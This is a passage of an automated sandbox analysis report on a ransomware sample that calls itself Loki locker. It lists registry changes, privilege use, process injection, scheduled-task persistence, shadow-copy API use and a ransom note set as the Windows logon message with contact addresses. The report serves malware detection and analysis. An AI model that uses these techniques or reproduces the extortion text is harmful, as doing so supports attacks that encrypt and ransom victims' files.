Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "CC" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "11.0" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.html\ = "NotSoCleverBotFile" cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "{37A9D401-0BF5-4366-9530-C75C6DC23EC9}" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Hedda" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\MSTTSLocenUS.dat" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "German Phone Converter" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\tn1040.bin" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft David - English (United States)" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294967295" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "5223743" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\AI043082" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\c1040.fe" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 0400000003000000020000000100000000000000ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\CortanaVoices\\Tokens\\MSTTS_V110_enUS_EvaM" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Cosimo" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\SniffedFolderType = "Documents" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\7\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHost_ = 6801000088020000 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 ~ 0009 aa 000a a 000b oh 000c ax 000d b 000e d 000f eh 0010 ey 0011 f 0012 g 0013 hy 0014 uy 0015 iy 0016 k 0017 l 0018 m 0019 n 001a ng 001b nj 001c oe 001d eu 001e ow 001f p 0020 r 0021 s 0022 sh 0023 t 0024 uw 0025 v 0026 w 0027 y 0028 z 0029 zh 002a" SearchApp.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 29384 reg.exe 24432 reg.exe -
Opens file in notepad (likely ransom note) 3 IoCs
pid Process 14636 NOTEPAD.EXE 3464 NOTEPAD.EXE 14200 Notepad.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2368 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 64 IoCs
pid Process 4200 explorer.exe 4200 explorer.exe 20104 drpbx.exe 20148 firefox.exe 20232 firefox.exe 20312 firefox.exe 20392 firefox.exe 20472 firefox.exe 20556 firefox.exe 20636 firefox.exe 20716 firefox.exe 20796 firefox.exe 20880 firefox.exe 20960 firefox.exe 21040 firefox.exe 21120 firefox.exe 21200 firefox.exe 21280 firefox.exe 21356 firefox.exe 21444 firefox.exe 10336 firefox.exe 10416 firefox.exe 10500 firefox.exe 10576 firefox.exe 10660 firefox.exe 10740 firefox.exe 10820 firefox.exe 21552 firefox.exe 21632 firefox.exe 21716 firefox.exe 21796 firefox.exe 21876 firefox.exe 21956 firefox.exe 22036 firefox.exe 22116 firefox.exe 22196 firefox.exe 22276 firefox.exe 22360 firefox.exe 22452 firefox.exe 22540 firefox.exe 22624 firefox.exe 22704 firefox.exe 22788 firefox.exe 22920 firefox.exe 23240 firefox.exe 23376 firefox.exe 23496 firefox.exe 23656 firefox.exe 23800 firefox.exe 23928 firefox.exe 24048 firefox.exe 24144 firefox.exe 24276 firefox.exe 24408 firefox.exe 24516 firefox.exe 24656 firefox.exe 24812 firefox.exe 24924 firefox.exe 25020 firefox.exe 25148 firefox.exe 25252 firefox.exe 25340 firefox.exe 25428 firefox.exe 25508 firefox.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 3984 sdiagnhost.exe 3984 sdiagnhost.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 4852 msedge.exe 4852 msedge.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 5848 taskmgr.exe 5556 OpenWith.exe 4200 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs
pid Process 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 5436 7zG.exe Token: 35 5436 7zG.exe Token: SeSecurityPrivilege 5436 7zG.exe Token: SeSecurityPrivilege 5436 7zG.exe Token: SeDebugPrivilege 5848 taskmgr.exe Token: SeSystemProfilePrivilege 5848 taskmgr.exe Token: SeCreateGlobalPrivilege 5848 taskmgr.exe Token: SeDebugPrivilege 3984 sdiagnhost.exe Token: SeRestorePrivilege 4340 7zG.exe Token: 35 4340 7zG.exe Token: SeSecurityPrivilege 4340 7zG.exe Token: SeSecurityPrivilege 4340 7zG.exe Token: SeRestorePrivilege 5640 7zG.exe Token: 35 5640 7zG.exe Token: SeSecurityPrivilege 5640 7zG.exe Token: SeSecurityPrivilege 5640 7zG.exe Token: SeRestorePrivilege 2720 7zG.exe Token: 35 2720 7zG.exe Token: SeSecurityPrivilege 2720 7zG.exe Token: SeSecurityPrivilege 2720 7zG.exe Token: SeDebugPrivilege 3916 e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe Token: SeSecurityPrivilege 5848 taskmgr.exe Token: SeTakeOwnershipPrivilege 5848 taskmgr.exe Token: SeDebugPrivilege 4024 winlogon.exe Token: SeDebugPrivilege 4920 winlogon.exe Token: SeIncreaseQuotaPrivilege 4496 WMIC.exe Token: SeSecurityPrivilege 4496 WMIC.exe Token: SeTakeOwnershipPrivilege 4496 WMIC.exe Token: SeLoadDriverPrivilege 4496 WMIC.exe Token: SeSystemProfilePrivilege 4496 WMIC.exe Token: SeSystemtimePrivilege 4496 WMIC.exe Token: SeProfSingleProcessPrivilege 4496 WMIC.exe Token: SeIncBasePriorityPrivilege 4496 WMIC.exe Token: SeCreatePagefilePrivilege 4496 WMIC.exe Token: SeBackupPrivilege 4496 WMIC.exe Token: SeRestorePrivilege 4496 WMIC.exe Token: SeShutdownPrivilege 4496 WMIC.exe Token: SeDebugPrivilege 4496 WMIC.exe Token: SeSystemEnvironmentPrivilege 4496 WMIC.exe Token: SeRemoteShutdownPrivilege 4496 WMIC.exe Token: SeUndockPrivilege 4496 WMIC.exe Token: SeManageVolumePrivilege 4496 WMIC.exe Token: 33 4496 WMIC.exe Token: 34 4496 WMIC.exe Token: 35 4496 WMIC.exe Token: 36 4496 WMIC.exe Token: SeIncreaseQuotaPrivilege 4496 WMIC.exe Token: SeSecurityPrivilege 4496 WMIC.exe Token: SeTakeOwnershipPrivilege 4496 WMIC.exe Token: SeLoadDriverPrivilege 4496 WMIC.exe Token: SeSystemProfilePrivilege 4496 WMIC.exe Token: SeSystemtimePrivilege 4496 WMIC.exe Token: SeProfSingleProcessPrivilege 4496 WMIC.exe Token: SeIncBasePriorityPrivilege 4496 WMIC.exe Token: SeCreatePagefilePrivilege 4496 WMIC.exe Token: SeBackupPrivilege 4496 WMIC.exe Token: SeRestorePrivilege 4496 WMIC.exe Token: SeShutdownPrivilege 4496 WMIC.exe Token: SeDebugPrivilege 4496 WMIC.exe Token: SeSystemEnvironmentPrivilege 4496 WMIC.exe Token: SeRemoteShutdownPrivilege 4496 WMIC.exe Token: SeUndockPrivilege 4496 WMIC.exe Token: SeManageVolumePrivilege 4496 WMIC.exe Token: 33 4496 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 5436 7zG.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 3856 msdt.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe -
Suspicious use of SetWindowsHookEx 62 IoCs
pid Process 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 3744 TextInputHost.exe 4456 StartMenuExperienceHost.exe 3744 TextInputHost.exe 632 StartMenuExperienceHost.exe 4828 SearchApp.exe 1544 TextInputHost.exe 1544 TextInputHost.exe 2684 StartMenuExperienceHost.exe 1000 SearchApp.exe 2412 TextInputHost.exe 2412 TextInputHost.exe 3708 StartMenuExperienceHost.exe 4272 SearchApp.exe 656 TextInputHost.exe 656 TextInputHost.exe 4560 StartMenuExperienceHost.exe 4044 SearchApp.exe 4192 firefox.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3212 wrote to memory of 5728 3212 msedge.exe 82 PID 3212 wrote to memory of 5728 3212 msedge.exe 82 PID 3212 wrote to memory of 3580 3212 msedge.exe 83 PID 3212 wrote to memory of 3580 3212 msedge.exe 83 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 -
System policy modification 1 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Encrypted by Loki locker" e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files have been encrypted due to a security problem with your computer\r\nIf you want to restore them, write us to the e-mail: [email protected]\r\nWrite this ID in the title of your message: 9FF76E0A\r\nIn case of no answer in 24 hours write us to this e-mail: [email protected]" e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bazaar.abuse.ch/browse.php?search=tag%3Alocker1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x318,0x7ffb3574f208,0x7ffb3574f214,0x7ffb3574f2202⤵PID:5728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1860,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:32⤵PID:3580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2160,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:22⤵PID:2096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2572,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:82⤵PID:4380
-
-
